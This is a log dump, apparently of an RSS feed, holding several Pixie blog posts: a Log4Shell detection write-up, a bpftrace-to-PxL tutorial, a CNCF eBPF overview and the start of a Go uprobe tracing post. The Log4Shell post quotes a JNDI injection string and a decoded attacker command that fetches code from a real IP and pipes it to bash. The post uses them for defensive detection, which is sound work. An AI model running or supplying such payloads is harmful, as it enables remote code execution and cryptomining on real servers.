5:35:42 PM: '# Get the pod the HTTP request was made to.\n' +

5:35:42 PM: 'df.pod = df.ctx['pod']\n' +

5:35:42 PM: '\n' +

5:35:42 PM: '# Check HTTP requests for the exploit signature.\n' +

5:35:42 PM: 're = '.*\\$.*{.*j.*n.*d.*i.*:.*'\n' +

5:35:42 PM: 'df.contains_log4j_exploit = px.regex_match(re, df.req_headers) or px.regex_match(re, df.req_body)\n' +

5:35:42 PM: '\n' +

5:35:42 PM: '# Filter on requests that are attacking us with the exploit.\n' +

5:35:42 PM: 'df = df[df.contains_log4j_exploit]\n' +

5:35:42 PM: '\n' +

5:35:42 PM: 'df = df[['time_', 'remote_addr', 'remote_port', 'req_headers', 'req_method', 'req_path', 'pod']]\n' +

5:35:42 PM: '\n' +

5:35:42 PM: 'px.display(df)\n' +

5:35:42 PM: '</code></pre><p><a href="https://www.lunasec.io/docs/blog/log4j-zero-day/#example-vulnerable-code">log4j only needs to log a string like</a> <code>${jndi:ldap://127.0.0.1/a}</code> to request and eventually execute a returned payload. <a href="https://docs.px.dev/about-pixie/data-sources/">Pixie traces all the HTTP requests</a> in your Kubernetes cluster, and stores them for future querying. So in our script, we simply search over the <code>http_events</code> table for requests that contain the attack signature - the <code>jndi</code> string. <sup id="fnref-1"><a href="#fn-1" class="footnote-ref">1</a></sup></p><p>Running the script on our cluster, we immediately noticed some <code>Log4Shell</code> traffic:</p><svg title="Pixie automatically traces all HTTP traffic flowing through your K8s cluster. Checking the HTTP request headers for the exploit signature exposes numerous attack requests on our staging cluster." src="jndi-http-logs.png"></svg><svg title="The contents of one of the HTTP attack requests. Note the 'jndi' exploit signature with originating IP address." src="jndi-referrer-details.png"></svg><p>The exploit requests were hitting our public cloud-proxy service, where the User-Agent included the exploit string. In this case, the attacker hopes that we use log4j to log the User-Agent value. We investigated the originating IP address, <code>45.155.205.233</code> and discovered that it was based in Russia.</p><p>Another team member, Vihang, then figured out that the payload of the exploit string is the following:</p><pre><code class="language-bash">$ base64 -d <<< "KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8zNC4xMDIuMTM2LjU4OjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8zNC4xMDIuMTM2LjU4OjQ0Myl8YmFzaA=="\n' +

5:35:42 PM: '(curl -s 45.155.205.233:5874/34.102.136.58:443||wget -q -O- 45.155.205.233:5874/34.102.136.58:443)|bash%\n' +

5:35:42 PM: '</code></pre><p>The situation around the <code>Log4Shell</code> exploit is still evolving, but <a href="https://twitter.com/GossiTheDog/status/1469322120840708100">tweets</a> indicate that this payload contains a Bitcoin miner.</p><h2>Are we leaking?</h2><p>Now we know that some attacker tried to scan us with the <code>Log4Shell</code> exploit. Our next question was whether the attacker succeeded. Again, Pixie doesn’t rely on Java services, but we did want to know how a Java user could detect a successful attack.</p><p>A successful exploit requires the attacker to "phone home” with sensitive information, so we need to check if any connections were made back to the <code>45.155.205.233</code> IP that we found in the attack.</p><p>We can use Pixie’s existing <code>px/outbound_conns</code> script to check for this. This script shows a list of connections from our pods made to endpoints outside the k8s cluster. This script has an optional IP filter field that we populate to see if any connections (regardless of protocol) are made to that IP.</p><p>In this case, when we run the script, we see that we have no such connections, as expected:</p><svg title="Using the `px/outbound_conns` script to check for all outbound connections from our pods, filtered by the IP address of the attacker shows that no connections were returned to the attacking IP." src="outboundconns.png"></svg><p>While we caught no such instances, for a user who was using Java, any outbound connections to the attacker would be recorded.</p><h2>Check if your cluster is being attacked</h2><alert severity="warning">Detecting these exploits is a moving target and as such the lack of any results from these scripts doesn't guarantee that your cluster isn't being attacked some other way. Whether or not you see any results from this script, we strongly recommend following all mitigation steps ASAP.</alert><p>When a 0-day exploit is published, there’s a rush by attackers to take advantage. At the same time, developers of cloud services are scrambling to see if they are exposed and to patch any vulnerabilities.</p><p>To quickly check if your cluster is being attacked, you can:</p><ol><li><a href="https://docs.px.dev/installing-pixie/install-guides/">Install Pixie</a> on your Kubernetes cluster.</li><li>Save the following script as <code>log4shell.pxl</code>. <sup id="fnref-2"><a href="#fn-2" class="footnote-ref">2</a></sup></li></ol><pre><code class="language-python">import px\n' +

5:35:42 PM: '\n' +

5:35:42 PM: '# Get all HTTP requests automatically traced by Pixie.\n' +

5:35:42 PM: 'df = px.DataFrame('http_events')\n' +

5:35:42 PM: '\n' +

5:35:42 PM: '# Get the pod the HTTP request was made to.\n' +

5:35:42 PM: 'df.pod = df.ctx['pod']\n' +

5:35:42 PM: '\n' +

5:35:42 PM: '# Check HTTP requests for the exploit signature.\n' +

5:35:42 PM: 're = '.*\\$.*{.*j.*n.*d.*i.*:.*'\n' +

5:35:42 PM: 'df.contains_log4j_exploit = px.regex_match(re, df.req_headers) or px.regex_match(re, df.req_body)\n' +

5:35:42 PM: '\n' +

5:35:42 PM: '# Filter on requests that are attacking us with the exploit.\n' +

5:35:42 PM: 'df = df[df.contains_log4j_exploit]\n' +

5:35:42 PM: '\n' +

5:35:42 PM: 'df = df[['time_', 'remote_addr', 'remote_port', 'req_headers', 'req_method', 'req_path', 'pod']]\n' +

5:35:42 PM: '\n' +

5:35:42 PM: 'px.display(df)\n' +

5:35:42 PM: '</code></pre><ol start="3"><li>Run the custom PxL script using Pixie’s <a href="https://docs.px.dev/using-pixie/using-cli/#use-the-live-cli">Live CLI</a>, using the -f flag to provide the script’s filename:</li></ol><pre><code class="language-bash">px live -f <path to script>/log4shell.pxl\n' +

5:35:42 PM: '</code></pre><p>If you discover that you are being attacked, you can read about mitigation steps <a href="https://www.lunasec.io/docs/blog/log4j-zero-day">here</a>.</p><p>Questions? Find us on <a href="https://slackin.px.dev/">Slack</a> or Twitter at <a href="https://twitter.com/pixie_run">@pixie_run</a>.</p><div class="footnotes"><hr/><ol><li id="fn-1">Unfortunately detecting exploit attempts are a moving target: <a href="https://twitter.com/sans_isc/status/1469653801581875208">scanners are trying new means of obfuscating the exploit</a>.<a href="#fnref-1" class="footnote-backref">↩</a></li><li id="fn-2">This script looks for the literal <code>jndi</code> in the request headers and body. This won't necessarily match obfuscated attacks and you probably want to tweak the script to match more patterns as need be.<a href="#fnref-2" class="footnote-backref">↩</a></li></ol></div>'

5:35:42 PM: }

5:35:42 PM: ]

5:35:42 PM: }

5:35:42 PM: {

5:35:42 PM: title: 'Distributed bpftrace with Pixie',

5:35:42 PM: date: '2021-10-27',

5:35:42 PM: description: 'I recently heard about Pixie: an open source debug platform for microservices-based applications. Pixie is built using Linux eBPF…',

5:35:42 PM: url: 'https://blog.px.dev/distributed-bpftrace/',

5:35:42 PM: guid: 'https://blog.px.dev/distributed-bpftrace/',

5:35:42 PM: custom_elements: [

5:35:42 PM: {

5:35:42 PM: 'content:encoded': '<style data-emotion="css-global 1tv1gz9">html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;box-sizing:border-box;-webkit-text-size-adjust:100%;}*,*::before,*::after{box-sizing:inherit;}strong,b{font-weight:700;}body{margin:0;color:rgba(var(--color-primary));padding:8px 0;font-family:Manrope,sans-serif;font-weight:400;font-size:1rem;line-height:1.5;letter-spacing:0.00938em;background-color:rgba(var(--color-background));}@media print{body{background-color:#fff;}}body::backdrop{background-color:rgba(var(--color-background));}</style><p>I recently heard about Pixie: an open source debug platform for microservices-based applications. <a href="https://docs.px.dev/about-pixie/pixie-ebpf/">Pixie is built using Linux eBPF</a> (enhanced Berkeley Packet Filter) technology, which promises to provide automatic monitoring. In addition to the <a href="https://docs.px.dev/about-pixie/data-sources/#supported-protocols">protocols it natively traces</a>, Pixie has a feature that enables us to execute <code>bpftrace</code>-like scripts on the cluster, which is great. After seeing the Pixie Launch in April 2021, I decided to investigate Pixie and its <code>bpftrace</code> feature.</p><p>To get a first glance of the actual implementation, I started with Pixie's <a href="https://www.youtube.com/watch?v=xT7OYAgIV28">reference video</a> in which they convert <code>bpftrace</code>’s <code>tcp-retransmit.bt</code> to an actual PxL script. In that Youtube video everything seemed well explained, so I proceeded with my journey.</p><p>In this post, I'll show you how you can deploy bpftrace code with Pixie and share the converted <code>bpftrace</code> tool scripts that I've contributed to Pixie.</p><h2>bpftrace Background</h2><p>If you are not familiar with <code>bpftrace</code>, no problem. <code>bpftrace</code> is a tool that provides a high-level tracing language for eBPF. In the background it uses the BCC Toolkit (<a href="https://github.com/iovisor">IO Visor project</a>) and LLVM to compile all scripts to BPF-bytecode. It supports Kernel probes (Kprobes), user-level probes (Uprobes) and tracepoints. <code>bpftrace</code> itself is highly inspired by tools like <code>awk</code>, <code>sed</code> and tracers like DTrace and SystemTap, with the result that we can create awesome one-liners.</p><p>This makes the tool very powerful, but also has a downside since it can only run locally and doesn’t provide functionality to run distributed on remote systems, nor has a central UI.</p><p>Pixie can help us make these parts easier. Pixie can distribute eBPF programs across Kubernetes clusters and provides tables that can be easily queried from both a UI, CLI, or API.</p><h2>Modifying <code>sleepy_snoop</code> to work with Pixie</h2><p>Let's develop our first <code>bpftrace</code> PxL script. For this example, we will use a famous one-liner, which we will call <code>sleepy_snoop</code>. Let's first look at the actual code itself.</p><pre><code class="language-cpp">kprobe:do_nanosleep { printf("PID %d sleeping\\n", pid); }\n' +

5:35:42 PM: '</code></pre><p>Pixie requires some <a href="https://docs.px.dev/tutorials/custom-data/distributed-bpftrace-deployment/#output">minor adjustments</a> to make this code work inside a PxL script:</p><ul><li>First, we have to escape the <code>printf</code> double quotes.</li><li>We need one <code>printf</code> statement that includes field names as actual output to the Pixie table, so we have to adjust the <code>printf</code> statements in the <code>kprobe:do_nanosleep</code> block to include the <code>pid</code> column name.</li><li>Additionally, we are going to enrich the output with the timestamp and process name. We can natively use <code>nsecs</code> with fieldname <code>time_</code>. This field is recognized by Pixie and automatically shown as human readable datetime format. For recording the process name, we use the built-in <code>comm</code> variable.</li></ul><p>The converted eBPF program should look like this:</p><pre><code class="language-cpp">kprobe:do_nanosleep { printf(\\"time_:%llu pid:%d comm:%s\\", nsecs, pid, comm); }\n' +

5:35:42 PM: '</code></pre><h2>Running <code>sleepy_snoop</code> from the Pixie CLI</h2><p>Now that we have the eBPF code, we can create the actual PxL script. You can find a copy of this script <a href="https://github.com/avwsolutions/app-debug-k8s-pixie-demo/blob/main/tracepoint-scripts/sleepy_snoop.pxl">here</a>.</p><pre><code class="language-python"># Import Pixie's modules for creating traces & querying data\n' +

5:35:42 PM: 'import pxtrace\n' +

5:35:42 PM: 'import px\n' +

5:35:42 PM: '\n' +

5:35:42 PM: '# Adapted from https://brendangregg.com\n' +

5:35:42 PM: '\n' +

5:35:42 PM: 'program = """\n' +

5:35:42 PM: 'kprobe:do_nanosleep { printf(\\"time_:%llu pid:%d comm:%s\\", nsecs, pid, comm); }\n' +

5:35:42 PM: '"""\n' +

5:35:42 PM: '\n' +

5:35:42 PM: '# sleepy_snoop_func function to create a tracepoint\n' +

5:35:42 PM: '# and start the data collection.\n' +

5:35:42 PM: 'def sleepy_snoop_func():\n' +

5:35:42 PM: ' table_name = 'sleepy_snoop_table'\n' +

5:35:42 PM: ' pxtrace.UpsertTracepoint('sleepy_snoop_tracer',\n' +

5:35:42 PM: ' table_name,\n' +

5:35:42 PM: ' program,\n' +

5:35:42 PM: ' pxtrace.kprobe(),\n' +

5:35:42 PM: ' "10m")\n' +

5:35:42 PM: ' df = px.DataFrame(table=table_name)\n' +

5:35:42 PM: '\n' +

5:35:42 PM: ' return df\n' +

5:35:42 PM: '\n' +

5:35:42 PM: 'output = sleepy_snoop_func();\n' +

5:35:42 PM: '\n' +

5:35:42 PM: '# display the tracepoint table data\n' +

5:35:42 PM: 'px.display(output)\n' +

5:35:42 PM: '</code></pre><p>This script looks a bit different from the PxL scripts which simply query already-collected data. In short, we:</p><ul><li>Import both <code>px</code> and <code>pxtrace</code> libraries.</li><li>Create a <code>program</code> variable that contains the BPF code.</li><li>Create a function to execute the tracepoint collection. In our case <code>sleepy_snoop_func</code>.</li><li>Define the target Pixie table to put the results into, called <code>sleepy_snoop_table</code>.</li><li>Define the Tracepoint to start the Kprobe, called <code>sleepy_snoop_tracer</code>. This includes a time-to-live of <code>10m</code>, which automatically removes the eBPF probes 10 minutes after the last script execution.</li><li>Create a <code>DataFrame</code> object from the table of results and display it in the UI.</li></ul><p>You can run the script using Pixie's CLI:</p><pre><code class="language-bash">px run -f sleepy_snoop.pxl\n' +

5:35:42 PM: '</code></pre><p>For more help on how to use Pixie's CLI, see the <a href="https://docs.px.dev/using-pixie/using-cli/">tutorial</a>.</p><p>An example of the CLI output is included below. Note that in some cases you may need to run the script twice. This is because a script may not have collected any data to display yet on the first run.</p><pre><code class="language-bash">px run -f sleepy_snoop.pxl\n' +

5:35:42 PM: 'Pixie CLI\n' +

5:35:42 PM: 'Table ID: output\n' +

5:35:42 PM: ' TIME PID COMM\n' +

5:35:42 PM: ' 2021-09-27 20:11:15.546971049 +0200 CEST 12123 pem\n' +

5:35:42 PM: ' 2021-09-27 20:11:15.614823431 +0200 CEST 4261 k8s_metadata\n' +

5:35:42 PM: ' 2021-09-27 20:11:15.615110023 +0200 CEST 4261 k8s_metadata\n' +

5:35:42 PM: ' 2021-09-27 20:11:15.615132796 +0200 CEST 8077 metadata\n' +

5:35:42 PM: ' 2021-09-27 20:11:15.615196553 +0200 CEST 4261 k8s_metadata\n' +

5:35:42 PM: ' 2021-09-27 20:11:15.621200052 +0200 CEST 4261 k8s_metadata\n' +

5:35:42 PM: ' 2021-09-27 20:11:15.621290646 +0200 CEST 4261 k8s_metadata\n' +

5:35:42 PM: ' 2021-09-27 20:11:15.621375788 +0200 CEST 4261 k8s_metadata\n' +

5:35:42 PM: ' 2021-09-27 20:11:15.546333885 +0200 CEST 6952 containerd-shim\n' +

5:35:42 PM: ' 2021-09-27 20:11:15.546344427 +0200 CEST 1495 containerd\n' +

5:35:42 PM: ' 2021-09-27 20:11:15.546366425 +0200 CEST 1495 containerd\n' +

5:35:42 PM: ' 2021-09-27 20:11:15.546429576 +0200 CEST 1495 containerd\n' +

5:35:42 PM: ' 2021-09-27 20:11:15.564011412 +0200 CEST 3563 containerd-shim\n' +

5:35:42 PM: ' 2021-09-27 20:11:15.566385845 +0200 CEST 1603 kubelet\n' +

5:35:42 PM: ' 2021-09-27 20:11:15.566485594 +0200 CEST 1603 kubelet\n' +

5:35:42 PM: ' 2021-09-27 20:11:15.615859719 +0200 CEST 4261 k8s_metadata\n' +

5:35:42 PM: '</code></pre><p>Congratulations, you have successfully created and deployed your first eBPF program with Pixie!</p><h2>Running <code>sleepy_snoop</code> from the Pixie UI</h2><p>We can also run this script <a href="https://docs.px.dev/using-pixie/using-live-ui/">using Pixie's UI</a>:</p><ul><li>Open the Pixie's UI</li><li>Select <code>Scratch Pad</code> from the <code>script</code> drop-down menu at the top.</li><li>Open the script editor using <code>ctrl+e</code> (Windows, Linux) or <code>cmd+e</code> (Mac) and paste in the script from the previous section. Close the editor using the same keyboard command.</li><li>Press the <code>RUN</code> button in the top right corner.</li></ul><div class="image-xl"><svg title="Running the sleepy_snoop.pxl script in Pixie's UI" src="sleepy_snoop.gif"></svg></div><p>After a successful run you will get the first results back on the left side of your window, which will be the table view with three columns: <code>TIME_</code>, <code>PID</code> and <code>COMM</code>. As mentioned before, this <code>sleepy_snoop</code> traces all pids that are calling sleep. You can click on a table row to see the row data in JSON form.</p><h2>Real-life demonstration using OOM Killer Tracepoint</h2><p>Let’s do one more example by looking for OOM killed processes. In short, OOM means Out-Of-Memory and we can easily simulate this on our Kubernetes cluster with the demo code found <a href="https://github.com/avwsolutions/app-debug-k8s-pixie-demo/tree/main/memleak">here</a>. To trace for these events we will use the <code>oomkill.bt</code> tool.</p><p>Let's first look at the <a href="https://github.com/iovisor/bpftrace/blob/master/tools/oomkill.bt">original code</a>:</p><pre><code class="language-cpp">#include <linux/oom.h>\n' +

5:35:42 PM: '\n' +

5:35:42 PM: 'BEGIN\n' +

5:35:42 PM: '{\n' +

5:35:42 PM: ' printf("Tracing oom_kill_process()... Hit Ctrl-C to end.\\n");\n' +

5:35:42 PM: '}\n' +

5:35:42 PM: '\n' +

5:35:42 PM: 'kprobe:oom_kill_process\n' +

5:35:42 PM: '{\n' +

5:35:42 PM: ' $oc = (struct oom_control *)arg0;\n' +

5:35:42 PM: ' time("%H:%M:%S ");\n' +

5:35:42 PM: ' printf("Triggered by PID %d (\\"%s\\"), ", pid, comm);\n' +

5:35:42 PM: ' printf("OOM kill of PID %d (\\"%s\\"), %d pages, loadavg: ",\n' +

5:35:42 PM: ' $oc->chosen->pid, $oc->chosen->comm, $oc->totalpages);\n' +

5:35:42 PM: ' cat("/proc/loadavg");\n' +

5:35:42 PM: '}\n' +

5:35:42 PM: '</code></pr'... 5694 more characters

5:35:42 PM: }

5:35:42 PM: ]

5:35:42 PM: }

5:35:42 PM: {

5:35:42 PM: title: 'A brief stroll through the CNCF eBPF landscape',

5:35:42 PM: date: '2022-04-19',

5:35:42 PM: description: 'eBPF has been steadily gaining traction in the past few years. The foundation for the idea sounds a bit esoteric on the surface - running…',

5:35:42 PM: url: 'https://blog.px.dev/ebpf-cncf/',

5:35:42 PM: guid: 'https://blog.px.dev/ebpf-cncf/',

5:35:42 PM: custom_elements: [

5:35:42 PM: {

5:35:42 PM: 'content:encoded': '<style data-emotion="css-global 1tv1gz9">html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;box-sizing:border-box;-webkit-text-size-adjust:100%;}*,*::before,*::after{box-sizing:inherit;}strong,b{font-weight:700;}body{margin:0;color:rgba(var(--color-primary));padding:8px 0;font-family:Manrope,sans-serif;font-weight:400;font-size:1rem;line-height:1.5;letter-spacing:0.00938em;background-color:rgba(var(--color-background));}@media print{body{background-color:#fff;}}body::backdrop{background-color:rgba(var(--color-background));}</style><p>eBPF has been steadily gaining traction in the past few years. The foundation for the idea sounds a bit esoteric on the surface - running user-defined programs in the Linux kernel. However, <strong>eBPF has made a huge splash because of the major applications it has in fields like observability, networking, and security</strong>.</p><p>In particular, eBPF made a large impact in the cloud native community. This is because the move to Kubernetes and microservices has introduced new challenges in deploying, monitoring, and securing applications - challenges that eBPF can help address.</p><p>With a lot of buzz and excitement, it can be hard to understand the adoption and applications of a technology like eBPF. In this blog post, we’ll get a quick overview of a few CNCF open source projects that are applying eBPF to solve important problems.</p><h2>What is eBPF?</h2><p><a href="https://ebpf.io/what-is-ebpf">eBPF</a> is a revolutionary technology that allows you to run lightweight sandboxed programs inside of the Linux kernel.</p><p>The operating system is the ideal location to implement observability, networking, and security functionality as it can oversee the entire system. However, before eBPF came onto the scene, writing code for the kernel was fraught with stability and compatibility issues: there was no guarantee that your code wouldn’t crash the kernel and changing kernel versions and architecture could easily break code.</p><p><strong>eBPF is game changing, because it provides a safe and efficient way to run code in the kernel.</strong> As shown in the overview below, eBPF allows the kernel to run BPF bytecode. While the front-end language used can vary, it is often a restricted subset of C. Typically the C code is first compiled to the BPF bytecode using Clang, then the bytecode is verified to make sure it's safe to execute. These strict verifications guarantee that the machine code will not intentionally or accidentally compromise the Linux kernel, and that the BPF probe will execute in a bounded number of instructions every time it is triggered.</p><div class="image-xl"><svg title="Example eBPF observability application (from <a href="https://www.brendangregg.com/ebpf.html#ebpf&quot;&gt;brendangregg.com&lt;/a&gt;)." src="linux_ebpf_internals.png"></svg></div><h2>What is the CNCF?</h2><p>The <a href="https://www.cncf.io/">Cloud Native Compute Forum</a> (CNCF) exists to promote the growth of the cloud native ecosystem. One of the ways it does this is by providing a vendor-neutral home for open source cloud-native projects. If you’ve worked with Kubernetes or Prometheus, you’ve already used a CNCF project. The CNCF brings together some of the world’s top developers and by looking at the emerging technologies used in its projects, you can get a glimpse into the direction of the future of cloud computing.</p><p>You can check out all of the CNCF’s open source projects <a href="https://landscape.cncf.io/?project=hosted">here</a>.</p><h2>eBPF in CNCF Projects</h2><p>Let’s examine how three different CNCF projects have applied eBPF to solve problems in the cloud-native space.</p><h3>Falco (Security)</h3><p>Securing software applications is already a difficult task, but when you break your applications into many small, scalable and distributed microservices, it can get even harder.</p><p><strong><a href="https://falco.org/">Falco</a> is an open source runtime security tool.</strong> Runtime security is the last layer of defense when securing your Kubernetes cluster and is designed to alert you to threats that sneak past other defense protections.</p><p>Falco monitors system calls to check for <a href="https://falco.org/docs/#what-does-falco-check-for">a variety of unusual behavior</a>, such as:</p><ul><li>Privilege escalation using privileged containers</li><li>Namespace changes using tools like <code>setns</code></li><li>Read/Writes to well-known directories such as <code>/etc</code>, <code>/usr/bin</code>, <code>/usr/sbin</code>, etc</li><li>Executing shell binaries or SSH binaries</li></ul><p>As shown in the diagram below, Falco can use an eBPF driver to safely and efficiently produce a stream of system call information. These system calls are parsed by the userspace program which checks against the rules defined in the configuration to determine whether to send an alert.</p><div class="image-xl"><svg title="Diagram showing how Falco works (from <a href="https://sysdig.com/blog/intro-runtime-security-falco/#how-dow-falco-work&quot;&gt;Sysdig&lt;/a&gt;)." src="falco.png"></svg></div><p><a href="https://falco.org/blog/choosing-a-driver">Falco supports multiple drivers</a>, including one using a kernel module and one using eBPF probes. Compared to the original kernel module, the newer eBPF driver is considered safer as it is unable to crash or panic a kernel. The eBPF driver is also able to run in environments where loading a kernel module is not an option (such as GKE).</p><p>To get started with Falco, check out the guide <a href="https://falco.org/docs/getting-started/">here</a>.</p><h3>Pixie (Observability)</h3><p>Kubernetes makes it easier to decouple application logic from infrastructure and scale up independent microservices. However, this introduces new complexity in observing the system's behavior.</p><p><strong><a href="https://px.dev/">Pixie</a> is an open source observability tool for Kubernetes applications.</strong> Observability is a rather vague term, but in Pixie’s case this includes <a href="https://docs.px.dev/tutorials/pixie-101/request-tracing/">full-body application requests</a>, <a href="https://docs.px.dev/tutorials/pixie-101/profiler/">application profiles</a> and <a href="https://docs.px.dev/tutorials/pixie-101/network-monitoring/">network</a> and <a href="https://docs.px.dev/tutorials/pixie-101/infra-health/">infra</a> health metrics.</p><p>All of the telemetry data provided by the Pixie platform is <a href="https://docs.px.dev/about-pixie/pixie-ebpf/">automatically captured using eBPF</a>. By using eBPF, Pixie eliminates the need for traditional manual instrumentation. Let’s take a look at how this works for application request tracing.</p><div class="image-xl"><svg title="Pixie protocol tracing using eBPF (from <a href="https://docs.px.dev/about-pixie/pixie-ebpf/&quot;&gt;docs.px.dev&lt;/a&gt;)." src="pixie.svg"></svg></div><p>When Pixie is deployed to the nodes in your cluster, it deploys eBPF kernel probes that are set up to trigger on the Linux syscalls used for networking. When your application makes any network-related syscalls -- such as <code>send()</code> and <code>recv()</code> -- Pixie's eBPF probes snoop the data and send it to Pixie’s edge module. The edge module parses the data according to the detected protocol and stores the data in tables locally on the node. These <a href="https://docs.px.dev/reference/datatables/">data tables</a> can then be queried and visualized using the Pixie API, CLI or web-based UI.</p><p>Got encrypted traffic? eBPF probes can be used to <a href="https://docs.px.dev/about-pixie/pixie-ebpf/#protocol-tracing-tracing-tlsssl-connections">trace TLS connections</a> too!</p><p>To get started with Pixie, check out the guide <a href="https://docs.px.dev/installing-pixie/install-guides/">here</a>.</p><h3>Cilium (Networking)</h3><p>Kubernetes can be highly dynamic with large numbers of containers getting created and destroyed in just seconds as applications scale to adapt to load changes or during rolling updates. This ephemeral nature of Kubernetes <a href="https://docs.cilium.io/en/stable/intro/#why-cilium-hubble">stresses the traditional networking approach</a> that operates using IP addresses and ports - as these methods of identification can frequently change.</p><p>Kubernetes can be highly dynamic with large numbers of containers getting created and destroyed in just seconds as applications scale to adapt to load changes or during rolling updates. For large clusters, this ephemeral nature of Kubernetes stresses the traditional network security approaches that operate using IP addresses and ports.</p><p><strong><a href="https://cilium.io">Cilium</a> is an open source Kubernetes container networking interface (CNI) plugin</strong> for providing and transparently securing network connectivity and load balancing between application workloads.</p><p>Similarly to Pixie, Cilium uses eBPF to observe network traffic at the Linux syscall level. However, Cilium also uses eBPF at the XDP/tc layer to influence the routing of packets. By being able to observe and interact with network traffic, eBPF allows Cilium to transparently insert security visibility + enforcement in a way that incorporates service / pod / container context. This solves the aforementioned networking problem by decoupling security from IP addresses and ports and instead using Kubernetes context for identity.</p><div class="image-xl"><svg title="eBPF is the foundation of Cilium. Diagram from (from <a href="https://cilium.io/get-started&quot;&gt;cilium.io&lt;/a&gt;)." src="cilium.png"></svg></div><p><a href="https://github.com/cilium/hubble">Hubble</a> is part of the Cilium project which <strong>provides network and security observability for cloud native workloads.</strong> Hubble provides <a href="https://github.com/cilium/hubble#service-dependency-graph">service maps</a>, <a href="https://githu'... 861 more characters

5:35:42 PM: }

5:35:42 PM: ]

5:35:42 PM: }

5:35:42 PM: {

5:35:42 PM: title: 'Debugging with eBPF Part 1: Tracing Go function arguments in prod',

5:35:42 PM: date: '2020-09-10',

5:35:42 PM: description: 'This is the first in a series of posts describing how we can debug applications in production using eBPF, without recompilation/redeployment…',

5:35:42 PM: url: 'https://blog.px.dev/ebpf-function-tracing/',

5:35:42 PM: guid: 'https://blog.px.dev/ebpf-function-tracing/',

5:35:42 PM: custom_elements: [

5:35:42 PM: {

5:35:42 PM: 'content:encoded': '<style data-emotion="css-global 1tv1gz9">html{-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;box-sizing:border-box;-webkit-text-size-adjust:100%;}*,*::before,*::after{box-sizing:inherit;}strong,b{font-weight:700;}body{margin:0;color:rgba(var(--color-primary));padding:8px 0;font-family:Manrope,sans-serif;font-weight:400;font-size:1rem;line-height:1.5;letter-spacing:0.00938em;background-color:rgba(var(--color-background));}@media print{body{background-color:#fff;}}body::backdrop{background-color:rgba(var(--color-background));}</style><p>This is the first in a series of posts describing how we can debug applications in production using eBPF, without recompilation/redeployment. This post describes how to use <a href="https://github.com/iovisor/gobpf">gobpf</a> and uprobes to build a function argument tracer for Go applications. This technique is also extendable to other compiled languages such as C++, Rust, etc. The next sets of posts in this series will discuss using eBPF for tracing HTTP/gRPC data, SSL, etc.</p><h1>Introduction</h1><p>When debugging, we are typically interested in capturing the state of a program. This allows us to examine what the application is doing and determine where the bug is located in our code. A simple way to observe state is to use a debugger to capture function arguments. For Go applications, we often use Delve or gdb.</p><p>Delve and gdb work well for debugging in a development environment, but they are not often used in production. The features that make these debuggers powerful can also make them undesirable to use in production systems. Debuggers can cause significant interruption to the program and even allow mutation of state which might lead to unexpected failures of production software.</p><p>To more cleanly capture function arguments, we will explore using enhanced BPF (<a href="https://ebpf.io">eBPF</a>), which is available in Linux 4.x+, and the higher level Go library <a href="https://github.com/iovisor/gobpf">gobpf</a>.</p><h1>What is eBPF?</h1><p>Extended BPF (eBPF) is a kernel technology that is available in Linux 4.x+. You can think of it as a lightweight sandboxed VM that runs inside of the Linux kernel and can provide verified access to kernel memory.</p><p>As shown in the overview below, eBPF allows the kernel to run BPF bytecode. While the front-end language used can vary, it is often a restricted subset of C. Typically the C code is first compiled to the BPF bytecode using Clang, then the bytecode is verified to make sure it's safe to execute. These strict verifications guarantee that the machine code will not intentionally or accidentally compromise the Linux kernel, and that the BPF probe will execute in a bounded number of instructions every time it is triggered. These guarantees enable eBPF to be used in performance-critical workloads like packet filtering, networking monitoring, etc.</p><p>Functionally, eBPF allows you to run restricted C code upon some event (eg. timer, network event or a function call). When triggered on a function call we call these functions probes and they can be used to either run on a function call within the kernel (kprobes), or a function call in a userspace program (uprobes). This post focuses on using uprobes to allow dynamic tracing of function arguments.</p><h1>Uprobes</h1><p>Uprobes allow you to intercept a userspace program by inserting a debug trap instruction (<code>int3</code> on an x86) that triggers a soft-interrupt . This is also <a href="https://eli.thegreenplace.net/2011/01/27/how-debuggers-work-part-2-breakpoints">how debuggers work</a>. The flow for an uprobe is essentially the same as any other BPF program and is summarized in the diagram below. The compiled and verified BPF program is executed as part of a uprobe, and the results can be written into a buffer.</p><div class="image-l"><p><figure class="gatsby-resp-image-figure">\n' +

5:35:42 PM: ' <span class="gatsby-resp-image-wrapper" style="position:relative;display:block;margin-left:auto;margin-right:auto;max-width:610px">\n' +

5:35:42 PM: ' <span class="gatsby-resp-image-background-image" style="padding-bottom:36.67953667953668%;position:relative;bottom:0;left:0;background-image:url('data:image/jpeg;base64,/9j/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9PDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhCY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wgARCAAHABQDASIAAhEBAxEB/8QAFgABAQEAAAAAAAAAAAAAAAAAAAIF/8QAFgEBAQEAAAAAAAAAAAAAAAAAAQAC/9oADAMBAAIQAxAAAAHaky0G/8QAFxAAAwEAAAAAAAAAAAAAAAAAAAECMf/aAAgBAQABBQJlE5//xAAUEQEAAAAAAAAAAAAAAAAAAAAQ/9oACAEDAQE/AT//xAAUEQEAAAAAAAAAAAAAAAAAAAAQ/9oACAECAQE/AT//xAAUEAEAAAAAAAAAAAAAAAAAAAAQ/9oACAEBAAY/An//xAAZEAADAAMAAAAAAAAAAAAAAAAAAREhMYH/2gAIAQEAAT8hfPRq0Vsf/9oADAMBAAIAAwAAABAIL//EABcRAQEBAQAAAAAAAAAAAAAAAAEAITH/2gAIAQMBAT8QOzjf/8QAFREBAQAAAAAAAAAAAAAAAAAAARD/2gAIAQIBAT8QCf/EABoQAQEAAwEBAAAAAAAAAAAAAAERACFBMWH/2gAIAQEAAT8QQuJIHTcYIvk+Zvd3mf/Z');background-size:cover;display:block"></span>\n' +

